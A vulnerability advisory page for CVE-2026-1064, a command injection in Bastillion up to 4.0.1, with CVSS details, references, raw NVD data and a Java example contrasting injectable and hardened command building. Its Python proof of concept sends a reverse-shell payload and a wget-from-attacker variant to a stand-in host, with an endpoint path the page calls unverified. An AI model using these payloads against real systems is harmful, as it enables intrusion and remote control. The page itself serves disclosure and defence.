Security Vulnerability Report
CVE-2026-1064 CVSS 4.7 MEDIUM

CVE-2026-1064

Published: 2026-01-17 21:15:50
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was found in bastillion-io Bastillion up to 4.0.1. This issue affects some unknown processing of the file src/main/java/io/bastillion/manage/control/SystemKtrl.java of the component System Management Module. Performing a manipulation results in command injection. The attack can be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.
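The record classifies the weakness as CWE-74/CWE-77 (command injection) but does not show the affected code in SystemKtrl.java. The following is an added illustration of that weakness class in Java, written for this page; it is not Bastillion's code and does not reproduce the actual vulnerable path. The `ping` wrapper, the `host` parameter and the allowlist pattern are hypothetical. It contrasts the injectable pattern (user input spliced into a string handed to `sh -c`) with the hardened form (an argument vector, no shell, and a strict allowlist on the input).

```java
import java.io.IOException;
import java.util.Arrays;
import java.util.List;
import java.util.regex.Pattern;

public class CommandInjectionDemo {

    // Vulnerable pattern (CWE-77): the caller-controlled value is concatenated
    // into a command string that a shell will parse, so ';', '|', '`' and
    // '$(...)' in the value become additional commands.
    static String buildVulnerableCommand(String host) {
        return "ping -c 1 " + host;
    }

    static Process runVulnerable(String host) throws IOException {
        // sh -c re-parses the whole string; metacharacters are honoured.
        return new ProcessBuilder("sh", "-c", buildVulnerableCommand(host)).start();
    }

    // Hardened form: allowlist the input, then pass it as one argv element.
    // Hypothetical hostname pattern: letters, digits, dots and hyphens only.
    private static final Pattern HOST = Pattern.compile("^[A-Za-z0-9.-]{1,253}$");

    static List<String> buildSafeArgv(String host) {
        if (!HOST.matcher(host).matches()) {
            throw new IllegalArgumentException("rejected host value: " + host);
        }
        return Arrays.asList("ping", "-c", "1", host);
    }

    static Process runSafe(String host) throws IOException {
        // No shell is involved: ProcessBuilder execs "ping" directly and the
        // host value reaches it as a single argument, whatever it contains.
        return new ProcessBuilder(buildSafeArgv(host)).start();
    }

    public static void main(String[] args) {
        // Constructed attacker-controlled input, not taken from the CVE record.
        String hostile = "127.0.0.1; id";

        // Vulnerable path: the injected "id" would run as a second command.
        System.out.println("vulnerable: sh -c \"" + buildVulnerableCommand(hostile) + "\"");

        // Hardened path: the same input is rejected before any process starts.
        try {
            System.out.println("safe argv: " + buildSafeArgv(hostile));
        } catch (IllegalArgumentException e) {
            System.out.println("safe: " + e.getMessage());
        }

        // A well-formed value passes and becomes exactly one argv element.
        System.out.println("safe argv: " + buildSafeArgv("example.org"));
    }
}
```

Neither `runVulnerable` nor `runSafe` is invoked from `main`, so the program prints the two command forms without executing anything; call them yourself on a test host to observe the difference in behaviour.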

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No CPE configuration data is available in the NVD record. The affected version range below is taken from the vulnerability description:

bastillion-io Bastillion <= 4.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2026-1064 PoC - Bastillion Command Injection
# Target: Bastillion <= 4.0.1
# Component: SystemKtrl.java (System Management Module)
#
# Note: the endpoint path and JSON parameter names below are the PoC author's;
# they are not stated in the CVE description or the NVD record. Verify them
# against the referenced report before relying on this script.

TARGET_URL = "http://target.com/bastillion"
ATTACKER_IP = "attacker.com"
ATTACKER_PORT = "4444"

# The vulnerability requires a high-privilege account (CVSS PR:H), so the
# request must carry a valid authenticated session. Cookie names are
# deployment-specific and not given on this page; populate this dict from a
# logged-in browser session before running.
AUTH_COOKIES = {}


def exploit_cve_2026_1064():
    """
    Exploit for CVE-2026-1064: Command Injection in Bastillion SystemKtrl.java
    Attack Vector: POST request to SystemKtrl endpoint
    Required: High privilege account authentication
    Payload: Command injection via system management parameters
    """
    # Construct malicious payload with reverse shell command
    # Inject command: bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1
    payload = {
        "action": "executeCommand",
        "systemId": "1",
        "command": ";bash -i >& /dev/tcp/" + ATTACKER_IP + "/" + ATTACKER_PORT + " 0>&1 #",
    }

    # Alternative payload using backticks for command injection.
    # Not sent by default; substitute it for `payload` below to test this variant.
    alt_payload = {
        "action": "executeCommand",
        "systemId": "1",
        "command": "`wget http://" + ATTACKER_IP + "/shell.sh`",
    }

    try:
        # Send exploit request as the authenticated high-privilege user
        response = requests.post(
            TARGET_URL + "/api/system/execute",
            json=payload,
            cookies=AUTH_COOKIES,
            verify=False,
            timeout=10,
        )
        print(f"[*] Payload sent to {TARGET_URL}")
        print(f"[*] Response status: {response.status_code}")
        # A 200 only means the request was accepted, not that the command ran;
        # the reverse-shell listener is the real success signal.
        if response.status_code == 200:
            print("[+] Exploit sent successfully")
            print("[*] Check for reverse shell on " + ATTACKER_IP + ":" + ATTACKER_PORT)
        else:
            print("[-] Exploit may have failed")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2026-1064 - Bastillion Command Injection PoC")
    print("=" * 60)
    exploit_cve_2026_1064()

References

https://github.com/AnalogyC0de/public_exp/blob/main/archives/Bastillion/report2.md
https://vuldb.com/?ctiid.341632
https://vuldb.com/?id.341632
https://vuldb.com/?submit.731308

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1064", "sourceIdentifier": "[email protected]", "published": "2026-01-17T21:15:49.693", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in bastillion-io Bastillion up to 4.0.1. This issue affects some unknown processing of the file src/main/java/io/bastillion/manage/control/SystemKtrl.java of the component System Management Module. Performing a manipulation results in command injection. The attack can be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se encontró una vulnerabilidad en bastillion-io Bastillion hasta 4.0.1. Este problema afecta un procesamiento desconocido del archivo src/main/java/io/bastillion/manage/control/SystemKtrl.java del componente Módulo de Gestión del Sistema. Realizar una manipulación resulta en inyección de comandos. El ataque puede iniciarse de forma remota. El exploit se ha hecho público y podría usarse. El proveedor fue contactado tempranamente sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-77"}]}], "references": [{"url": "https://github.com/AnalogyC0de/public_exp/blob/main/archives/Bastillion/report2.md", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.341632", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.341632", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.731308", "source": "[email protected]"}]}}